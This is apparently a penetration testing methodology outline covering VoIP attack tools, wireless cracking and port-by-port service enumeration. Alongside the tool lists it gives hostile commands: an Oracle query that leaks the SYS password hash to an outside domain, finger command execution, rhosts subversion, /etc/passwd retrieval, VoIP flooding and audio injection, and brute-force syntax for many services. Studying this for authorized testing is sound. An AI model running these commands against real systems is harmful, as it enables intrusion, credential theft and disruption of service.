1. Back end files
1.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
2. Nabil contributed the AS/400 section.
3. VoIP Security
3.1. Sniffing Tools
3.1.1. AuthTool
3.1.2. Cain & Abel
3.1.3. Etherpeek
3.1.4. NetDude
3.1.5. Oreka
3.1.6. PSIPDump
3.1.7. SIPomatic
3.1.8. SIPv6 Analyzer
3.1.9. UCSniff
3.1.10. VoiPong
3.1.11. VOMIT
3.1.12. Wireshark
3.1.13. WIST - Web Interface for SIP Trace
3.2. Scanning and Enumeration Tools
3.2.1. enumIAX
3.2.2. fping
3.2.3. IAX Enumerator
3.2.4. iWar
3.2.5. Nessus
3.2.6. Nmap
3.2.7. SIP Forum Test Framework (SFTF)
3.2.8. SIPcrack
3.2.9. sipflanker
3.2.9.1. python sipflanker.py 192.168.1-254
3.2.10. SIP-Scan
3.2.11. SIP.Tastic
3.2.12. SIPVicious
3.2.13. SiVuS
3.2.14. SMAP
3.2.14.1. smap IP_Address/Subnet_Mask
3.2.14.2. smap -o IP_Address/Subnet_Mask
3.2.14.3. smap -l IP_Address
3.2.15. snmpwalk
3.2.16. VLANping
3.2.17. VoIPAudit
3.2.18. VoIP GHDB Entries
3.2.19. VoIP Voicemail Database
3.3. Packet Creation and Flooding Tools
3.3.1. H.323 Injection Files
3.3.2. H225regreject
3.3.3. IAXHangup
3.3.4. IAXAuthJack
3.3.5. IAX.Brute
3.3.6. IAXFlooder
3.3.6.1. ./iaxflood sourcename destinationname numpackets
3.3.7. INVITE Flooder
3.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
3.3.8. kphone-ddos
3.3.9. RTP Flooder
3.3.10. rtpbreak
3.3.11. Scapy
3.3.12. Seagull
3.3.13. SIPBomber
3.3.14. SIPNess
3.3.15. SIPp
3.3.16. SIPsak
3.3.16.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
3.3.16.2. Options request:- sipsak -vv -s sip:username@domain
3.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
3.3.17. SIP-Send-Fun
3.3.18. SIPVicious
3.3.19. Spitter
3.3.20. TFTP Brute Force
3.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
3.3.21. UDP Flooder
3.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
3.3.22. UDP Flooder (with VLAN Support)
3.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
3.3.23. Voiphopper
3.4. Fuzzing Tools
3.4.1. Asteroid
3.4.2. Codenomicon VoIP Fuzzers
3.4.3. Fuzzy Packet
3.4.4. Mu Security VoIP Fuzzing Platform
3.4.5. ohrwurm RTP Fuzzer
3.4.6. PROTOS H.323 Fuzzer
3.4.7. PROTOS SIP Fuzzer
3.4.8. SIP Forum Test Framework (SFTF)
3.4.9. Sip-Proxy
3.4.10. Spirent ThreatEx
3.5. Signaling Manipulation Tools
3.5.1. AuthTool
3.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
3.5.2. BYE Teardown
3.5.3. Check Sync Phone Rebooter
3.5.4. RedirectPoison
3.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
3.5.5. Registration Adder
3.5.6. Registration Eraser
3.5.7. Registration Hijacker
3.5.8. SIP-Kill
3.5.9. SIP-Proxy-Kill
3.5.10. SIP-RedirectRTP
3.5.11. SipRogue
3.5.12. vnak
3.6. Media Manipulation Tools
3.6.1. RTP InsertSound
3.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
3.6.2. RTP MixSound
3.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
3.6.3. RTPProxy
3.6.4. RTPInject
3.7. Generic Software Suites
3.7.1. OAT Office Communication Server Tool Assessment
3.7.2. EnableSecurity VOIPPACK
3.7.2.1. Note: - Add-on for Immunity Canvas
3.8. References
3.8.1. URL's
3.8.1.1. Common Vulnerabilities and Exploits (CVE)
3.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
3.8.1.2. Default Passwords
3.8.1.3. Hacking Exposed VoIP
3.8.1.3.1. Tool Pre-requisites
3.8.1.4. VoIPsa
3.8.2. White Papers
3.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
3.8.2.2. An Analysis of VoIP Security Threats and Tools
3.8.2.3. Hacking VoIP Exposed
3.8.2.4. Security testing of SIP implementations
3.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
3.8.2.6. Two attacks against VoIP
3.8.2.7. VoIP Attacks!
3.8.2.8. VoIP Security Audit Program (VSAP)
4. Wireless Penetration
4.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.
4.1.1. Site Map
4.1.1.1. RF Map
4.1.1.1.1. Lines of Sight
4.1.1.1.2. Signal Coverage
4.1.1.2. Physical Map
4.1.1.2.1. Triangulate APs
4.1.1.2.2. Satellite Imagery
4.1.2. Network Map
4.1.2.1. MAC Filter
4.1.2.1.1. Authorised MAC Addresses
4.1.2.1.2. Reaction to Spoofed MAC Addresses
4.1.2.2. Encryption Keys utilised
4.1.2.2.1. WEP
4.1.2.2.2. WPA/PSK
4.1.2.2.3. 802.1x
4.1.2.3. Access Points
4.1.2.3.1. ESSID
4.1.2.3.2. BSSIDs
4.1.2.4. Wireless Clients
4.1.2.4.1. MAC Addresses
4.1.2.4.2. Intercepted Traffic
4.2. Wireless Toolkit
4.2.1. Wireless Discovery
4.2.1.1. Aerosol
4.2.1.2. Airfart
4.2.1.3. Aphopper
4.2.1.4. Apradar
4.2.1.5. BAFFLE
4.2.1.6. inSSIDer
4.2.1.7. iWEPPro
4.2.1.8. karma
4.2.1.9. KisMAC-ng
4.2.1.10. Kismet
4.2.1.11. MiniStumbler
4.2.1.12. Netstumbler
4.2.1.13. Vistumbler
4.2.1.14. Wellenreiter
4.2.1.15. Wifi Hopper
4.2.1.16. WirelessMon
4.2.1.17. WiFiFoFum
4.2.2. Packet Capture
4.2.2.1. Airopeek
4.2.2.2. Airpcap
4.2.2.3. Airtraf
4.2.2.4. Apsniff
4.2.2.5. Cain
4.2.2.6. Commview
4.2.2.7. Ettercap
4.2.2.8. Netmon
4.2.2.8.1. nmwifi
4.2.2.9. Wireshark
4.2.3. EAP Attack tools
4.2.3.1. eapmd5pass
4.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
4.2.3.1.2. Untitled
4.2.4. Leap Attack Tools
4.2.4.1. asleap
4.2.4.2. thc leap cracker
4.2.4.3. anwrap
4.2.5. WEP/ WPA Password Attack Tools
4.2.5.1. Airbase
4.2.5.2. Aircrack-ptw
4.2.5.3. Aircrack-ng
4.2.5.4. Airsnort
4.2.5.5. cowpatty
4.2.5.6. FiOS Wireless Key Calculator
4.2.5.7. iWifiHack
4.2.5.8. KisMAC-ng
4.2.5.9. Rainbow Tables
4.2.5.10. wep attack
4.2.5.11. wep crack
4.2.5.12. wzcook
4.2.6. Frame Generation Software
4.2.6.1. Airgobbler
4.2.6.2. airpwn
4.2.6.3. Airsnarf
4.2.6.4. Commview
4.2.6.5. fake ap
4.2.6.6. void 11
4.2.6.7. wifi tap
4.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
4.2.6.8. FreeRADIUS - Wireless Pwnage Edition
4.2.7. Mapping Software
4.2.7.1. Online Mapping
4.2.7.1.1. WIGLE
4.2.7.1.2. Skyhook
4.2.7.2. Tools
4.2.7.2.1. Knsgem
4.2.8. File Format Conversion Tools
4.2.8.1. ns1 recovery and conversion tool
4.2.8.2. warbable
4.2.8.3. warkizniz
4.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
4.2.8.4. ivstools
4.2.9. IDS Tools
4.2.9.1. WIDZ
4.2.9.2. War Scanner
4.2.9.3. Snort-Wireless
4.2.9.4. AirDefense
4.2.9.5. AirMagnet
4.3. WLAN discovery
4.3.1. Unencrypted WLAN
4.3.1.1. Visible SSID
4.3.1.1.1. Sniff for IP range
4.3.1.2. Hidden SSID
4.3.1.2.1. Deauth client
4.3.2. WEP encrypted WLAN
4.3.2.1. Visible SSID
4.3.2.1.1. WEPattack
4.3.2.2. Hidden SSID
4.3.2.2.1. Deauth client
4.3.3. WPA / WPA2 encrypted WLAN
4.3.3.1. Deauth client
4.3.3.1.1. Capture EAPOL handshake
4.3.4. LEAP encrypted WLAN
4.3.4.1. Deauth client
4.3.4.1.1. Break LEAP
4.3.5. 802.1x WLAN
4.3.5.1. Create Rogue Access Point
4.3.5.1.1. Airsnarf
4.3.5.1.2. fake ap
4.3.5.1.3. Hotspotter
4.3.5.1.4. Karma
4.3.5.1.5. Linux rogue AP
4.3.6. Resources
4.3.6.1. URL's
4.3.6.1.1. Wirelessdefence.org
4.3.6.1.2. Russix
4.3.6.1.3. Wardrive.net
4.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
4.3.6.2. White Papers
4.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
4.3.6.2.2. 802.11b Firmware-Level Attacks
4.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
4.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
4.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds
4.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
4.3.6.2.7. Active behavioral fingerprinting of wireless devices
4.3.6.3. Common Vulnerabilities and Exploits (CVE)
4.3.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
5. Pre-Inspection Visit - template
6. pwdump [-h][-o][-u][-p] machineName
7. Client Side Security
8. Enumeration
8.1. Daytime port 13 open
8.1.1. nmap nse script
8.1.1.1. daytime
8.2. FTP port 21 open
8.2.1. Fingerprint server
8.2.1.1. telnet ip_address 21 (Banner grab)
8.2.1.2. Run command ftp ip_address
8.2.1.3. ftp@example.com
8.2.1.4. Check for anonymous access
8.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
8.2.2. Password guessing
8.2.2.1. Hydra brute force
8.2.2.2. medusa
8.2.2.3. Brutus
8.2.3. Examine configuration files
8.2.3.1. ftpusers
8.2.3.2. ftp.conf
8.2.3.3. proftpd.conf
8.2.4. MiTM
8.2.4.1. pasvagg.pl
8.3. SSH port 22 open
8.3.1. Fingerprint server
8.3.1.1. telnet ip_address 22 (banner grab)
8.3.1.2. scanssh
8.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
8.3.2. Password guessing
8.3.2.1. ssh root@ip_address
8.3.2.2. guess-who
8.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
8.3.2.3. Hydra brute force
8.3.2.4. brutessh
8.3.2.5. Ruby SSH Bruteforcer
8.3.3. Examine configuration files
8.3.3.1. ssh_config
8.3.3.2. sshd_config
8.3.3.3. authorized_keys
8.3.3.4. ssh_known_hosts
8.3.3.5. .shosts
8.3.4. SSH Client programs
8.3.4.1. tunnelier
8.3.4.2. winsshd
8.3.4.3. putty
8.3.4.4. winscp
8.4. Telnet port 23 open
8.4.1. Fingerprint server
8.4.1.1. telnet ip_address
8.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
8.4.1.2. telnetfp
8.4.2. Password Attack
8.4.2.1. Untitled
8.4.2.2. Hydra brute force
8.4.2.3. Brutus
8.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
8.4.3. Examine configuration files
8.4.3.1. /etc/inetd.conf
8.4.3.2. /etc/xinetd.d/telnet
8.4.3.3. /etc/xinetd.d/stelnet
8.5. Sendmail Port 25 open
8.5.1. Fingerprint server
8.5.1.1. telnet ip_address 25 (banner grab)
8.5.2. Mail Server Testing
8.5.2.1. Enumerate users
8.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
8.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
8.5.2.2. Mail Spoof Test
8.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
8.5.2.3. Mail Relay Test
8.5.2.3.1. Untitled
8.5.3. Examine Configuration Files
8.5.3.1. sendmail.cf
8.5.3.2. submit.cf
8.6. DNS port 53 open
8.6.1. Fingerprint server/ service
8.6.1.1. host
8.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
8.6.1.2. nslookup
8.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
8.6.1.3. dig
8.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
8.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
8.6.2. DNS Enumeration
8.6.2.1. Bile Suite
8.6.2.1.1. perl BiLE.pl [website] [project_name]
8.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
8.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
8.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
8.6.2.1.5. perl exp-tld.pl [input file] [output file]
8.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
8.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]
8.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]
8.6.2.2. txdns
8.6.2.2.1. txdns -rt -t domain_name
8.6.2.2.2. txdns -x 50 -bb domain_name
8.6.2.3. nmap nse scripts
8.6.2.3.1. dns-random-srcport
8.6.2.3.2. dns-random-txid
8.6.2.3.3. dns-recursion
8.6.2.3.4. dns-zone-transfer
8.6.3. Examine Configuration Files
8.6.3.1. host.conf
8.6.3.2. resolv.conf
8.6.3.3. named.conf
8.7. TFTP port 69 open
8.7.1. TFTP Enumeration
8.7.1.1. tftp ip_address PUT local_file
8.7.1.2. tftp ip_address GET conf.txt (or other files)
8.7.1.3. Solarwinds TFTP server
8.7.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)
8.7.2. TFTP Bruteforcing
8.7.2.1. TFTP bruteforcer
8.7.2.2. Cisco-Torch
8.8. Finger Port 79 open
8.8.1. User enumeration
8.8.1.1. finger 'a b c d e f g h' @example.com
8.8.1.2. finger admin@example.com
8.8.1.3. finger user@example.com
8.8.1.4. finger 0@example.com
8.8.1.5. finger .@example.com
8.8.1.6. finger **@example.com
8.8.1.7. finger test@example.com
8.8.1.8. finger @example.com
8.8.1.9. nmap nse script
8.8.1.9.1. finger
8.8.2. Command execution
8.8.2.1. finger "|/bin/id@example.com"
8.8.2.2. finger "|/bin/ls -a /@example.com"
8.8.3. Finger Bounce
8.8.3.1. finger user@host@victim
8.8.3.2. finger @internal@external
8.9. Web Ports 80,8080 etc. open
8.9.1. Fingerprint server
8.9.1.1. Telnet ip_address port
8.9.1.2. Firefox plugins
8.9.1.2.1. All
8.9.1.2.2. Specific
8.9.2. Crawl website
8.9.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
8.9.2.2. httprint
8.9.2.3. Metagoofil
8.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
8.9.3. Web Directory enumeration
8.9.3.1. Nikto
8.9.3.1.1. nikto [-h target] [options]
8.9.3.2. DirBuster
8.9.3.3. Wikto
8.9.3.4. Goolag Scanner
8.9.4. Vulnerability Assessment
8.9.4.1. Manual Tests
8.9.4.1.1. Default Passwords
8.9.4.1.2. Install Backdoors
8.9.4.1.3. Method Testing
8.9.4.1.4. Upload Files
8.9.4.1.5. View Page Source
8.9.4.1.6. Input Validation Checks
8.9.4.1.7. Automated table and column iteration
8.9.4.2. Vulnerability Scanners
8.9.4.2.1. Acunetix
8.9.4.2.2. Grendelscan
8.9.4.2.3. NStealth
8.9.4.2.4. Obiwan III
8.9.4.2.5. w3af
8.9.4.3. Specific Applications/ Server Tools
8.9.4.3.1. Domino
8.9.4.3.2. Joomla
8.9.4.3.3. aspaudit.pl
8.9.4.3.4. Vbulletin
8.9.4.3.5. ZyXel
8.9.5. Proxy Testing
8.9.5.1. Burpsuite
8.9.5.2. Crowbar
8.9.5.3. Interceptor
8.9.5.4. Paros
8.9.5.5. Requester Raw
8.9.5.6. Suru
8.9.5.7. WebScarab
8.9.6. Examine configuration files
8.9.6.1. Generic
8.9.6.1.1. Examine httpd.conf/ windows config files
8.9.6.2. JBoss
8.9.6.2.1. JMX Console http://<IP>:8080/jmxconcole/
8.9.6.3. Joomla
8.9.6.3.1. configuration.php
8.9.6.3.2. diagnostics.php
8.9.6.3.3. joomla.inc.php
8.9.6.3.4. config.inc.php
8.9.6.4. Mambo
8.9.6.4.1. configuration.php
8.9.6.4.2. config.inc.php
8.9.6.5. Wordpress
8.9.6.5.1. setup-config.php
8.9.6.5.2. wp-config.php
8.9.6.6. ZyXel
8.9.6.6.1. /WAN.html (contains PPPoE ISP password)
8.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
8.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)
8.9.6.6.4. /Firewall_DefPolicy.html (Firewall)
8.9.6.6.5. /CF_Keyword.html (Content Filter)
8.9.6.6.6. /RemMagWWW.html (Remote MGMT)
8.9.6.6.7. /rpSysAdmin.html (System)
8.9.6.6.8. /LAN_IP.html (LAN)
8.9.6.6.9. /NAT_General.html (NAT)
8.9.6.6.10. /ViewLog.html (Logs)
8.9.6.6.11. /rpFWUpload.html (Tools)
8.9.6.6.12. /DiagGeneral.html (Diagnostic)
8.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)
8.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
8.9.6.6.15. Config Backups
8.9.7. Examine web server logs
8.9.7.1. c:\winnt\system32\Logfiles\W3SVC1
8.9.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq
8.9.8. References
8.9.8.1. White Papers
8.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
8.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
8.9.8.1.3. Blind Security Testing - An Evolutionary Approach
8.9.8.1.4. Command Injection in XML Signatures and Encryption
8.9.8.1.5. Input Validation Cheat Sheet
8.9.8.1.6. SQL Injection Cheat Sheet
8.9.8.2. Books
8.9.8.2.1. Hacking Exposed Web 2.0
8.9.8.2.2. Hacking Exposed Web Applications
8.9.8.2.3. The Web Application Hacker's Handbook
8.9.9. Exploit Frameworks
8.9.9.1. Brute-force Tools
8.9.9.1.1. Acunetix
8.9.9.2. Metasploit
8.9.9.3. w3af
8.10. Portmapper port 111 open
8.10.1. rpcdump.py
8.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
8.10.2. rpcinfo
8.10.2.1. rpcinfo [options] IP_Address
8.11. NTP Port 123 open
8.11.1. NTP Enumeration
8.11.1.1. ntpdc -c monlist IP_ADDRESS
8.11.1.2. ntpdc -c sysinfo IP_ADDRESS
8.11.1.3. ntpq
8.11.1.3.1. host
8.11.1.3.2. hostname
8.11.1.3.3. ntpversion
8.11.1.3.4. readlist
8.11.1.3.5. version
8.11.2. Examine configuration files
8.11.2.1. ntp.conf
8.11.3. nmap nse script
8.11.3.1. ntp-info
8.12. NetBIOS Ports 135-139,445 open
8.12.1. NetBIOS enumeration
8.12.1.1. Enum
8.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
8.12.1.2. Null Session
8.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
8.12.1.3. Smbclient
8.12.1.3.1. smbclient -L //server/share password options
8.12.1.4. Superscan
8.12.1.4.1. Enumeration tab.
8.12.1.5. user2sid/sid2user
8.12.1.6. Winfo
8.12.2. NetBIOS brute force
8.12.2.1. Hydra
8.12.2.2. Brutus
8.12.2.3. Cain & Abel
8.12.2.4. getacct
8.12.2.5. NAT (NetBIOS Auditing Tool)
8.12.3. Examine Configuration Files
8.12.3.1. Smb.conf
8.12.3.2. lmhosts
8.13. SNMP port 161 open
8.13.1. Default Community Strings
8.13.1.1. public
8.13.1.2. private
8.13.1.3. cisco
8.13.1.3.1. cable-docsis
8.13.1.3.2. ILMI
8.13.2. MIB enumeration
8.13.2.1. Windows NT
8.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
8.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
8.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
8.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
8.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
8.13.2.2. Solarwinds MIB walk
8.13.2.3. Getif
8.13.2.4. snmpwalk
8.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
8.13.2.5. Snscan
8.13.2.6. Applications
8.13.2.6.1. ZyXel
8.13.2.7. nmap nse script
8.13.2.7.1. snmp-sysdescr
8.13.3. SNMP Bruteforce
8.13.3.1. onesixtyone
8.13.3.1.1. onesixytone -c SNMP.wordlist <IP>
8.13.3.2. cat
8.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist
8.13.3.3. Solarwinds SNMP Brute Force
8.13.3.4. ADMsnmp
8.13.3.5. nmap nse script
8.13.3.5.1. snmp-brute
8.13.4. Examine SNMP Configuration files
8.13.4.1. snmp.conf
8.13.4.2. snmpd.conf
8.13.4.3. snmp-config.xml
8.14. LDAP Port 389 Open
8.14.1. ldap enumeration
8.14.1.1. ldapminer
8.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
8.14.1.2. luma
8.14.1.2.1. Gui based tool
8.14.1.3. ldp
8.14.1.3.1. Gui based tool
8.14.1.4. openldap
8.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
8.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
8.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
8.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
8.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
8.14.2. ldap brute force
8.14.2.1. bf_ldap
8.14.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
8.14.2.2. K0ldS
8.14.2.3. LDAP_Brute.pl
8.14.3. Examine Configuration Files
8.14.3.1. General
8.14.3.1.1. containers.ldif
8.14.3.1.2. ldap.cfg
8.14.3.1.3. ldap.conf
8.14.3.1.4. ldap.xml
8.14.3.1.5. ldap-config.xml
8.14.3.1.6. ldap-realm.xml
8.14.3.1.7. slapd.conf
8.14.3.2. IBM SecureWay V3 server
8.14.3.2.1. V3.sas.oc
8.14.3.3. Microsoft Active Directory server
8.14.3.3.1. msadClassesAttrs.ldif
8.14.3.4. Netscape Directory Server 4
8.14.3.4.1. nsslapd.sas_at.conf
8.14.3.4.2. nsslapd.sas_oc.conf
8.14.3.5. OpenLDAP directory server
8.14.3.5.1. slapd.sas_at.conf
8.14.3.5.2. slapd.sas_oc.conf
8.14.3.6. Sun ONE Directory Server 5.1
8.14.3.6.1. 75sas.ldif
8.15. PPTP/L2TP/VPN port 500/1723 open
8.15.1. Enumeration
8.15.1.1. ike-scan
8.15.1.2. ike-probe
8.15.2. Brute-Force
8.15.2.1. ike-crack
8.15.3. Reference Material
8.15.3.1. PSK cracking paper
8.15.3.2. SecurityFocus Infocus
8.15.3.3. Scanning a VPN Implementation
8.16. Modbus port 502 open
8.16.1. modscan
8.17. rlogin port 513 open
8.17.1. Rlogin Enumeration
8.17.1.1. Find the files
8.17.1.1.1. find / -name .rhosts
8.17.1.1.2. locate .rhosts
8.17.1.2. Examine Files
8.17.1.2.1. cat .rhosts
8.17.1.3. Manual Login
8.17.1.3.1. rlogin hostname -l username
8.17.1.3.2. rlogin <IP>
8.17.1.4. Subvert the files
8.17.1.4.1. echo ++ > .rhosts
8.17.2. Rlogin Brute force
8.17.2.1. Hydra
8.18. rsh port 514 open
8.18.1. Rsh Enumeration
8.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
8.18.2. Rsh Brute Force
8.18.2.1. rsh-grind
8.18.2.2. Hydra
8.18.2.3. medusa
8.19. SQL Server Port 1433 1434 open
8.19.1. SQL Enumeration
8.19.1.1. piggy
8.19.1.2. SQLPing
8.19.1.2.1. sqlping ip_address/hostname
8.19.1.3. SQLPing2
8.19.1.4. SQLPing3
8.19.1.5. SQLpoke
8.19.1.6. SQL Recon
8.19.1.7. SQLver
8.19.2. SQL Brute Force
8.19.2.1. SQLPAT
8.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
8.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
8.19.2.2. SQL Dict
8.19.2.3. SQLAT
8.19.2.4. Hydra
8.19.2.5. SQLlhf
8.19.2.6. ForceSQL
8.20. Citrix port 1494 open
8.20.1. Citrix Enumeration
8.20.1.1. Default Domain
8.20.1.2. Published Applications
8.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
8.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
8.20.2. Citrix Brute Force
8.20.2.1. bforce.js
8.20.2.2. connect.js
8.20.2.3. Citrix Brute-forcer
8.20.2.4. Reference Material
8.20.2.4.1. Hacking Citrix - the legitimate backdoor
8.20.2.4.2. Hacking Citrix - the forceful way
8.21. Oracle Port 1521 Open
8.21.1. Oracle Enumeration
8.21.1.1. oracsec
8.21.1.2. Repscan
8.21.1.3. Sidguess
8.21.1.4. Scuba
8.21.1.5. DNS/HTTP Enumeration
8.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
8.21.1.5.2. Untitled
8.21.1.6. WinSID
8.21.1.7. Oracle default password list
8.21.1.8. TNSVer
8.21.1.8.1. tnsver host [port]
8.21.1.9. TCP Scan
8.21.1.10. Oracle TNSLSNR
8.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
8.21.1.11. TNSCmd
8.21.1.11.1. perl tnscmd.pl -h ip_address
8.21.1.11.2. perl tnscmd.pl version -h ip_address
8.21.1.11.3. perl tnscmd.pl status -h ip_address
8.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
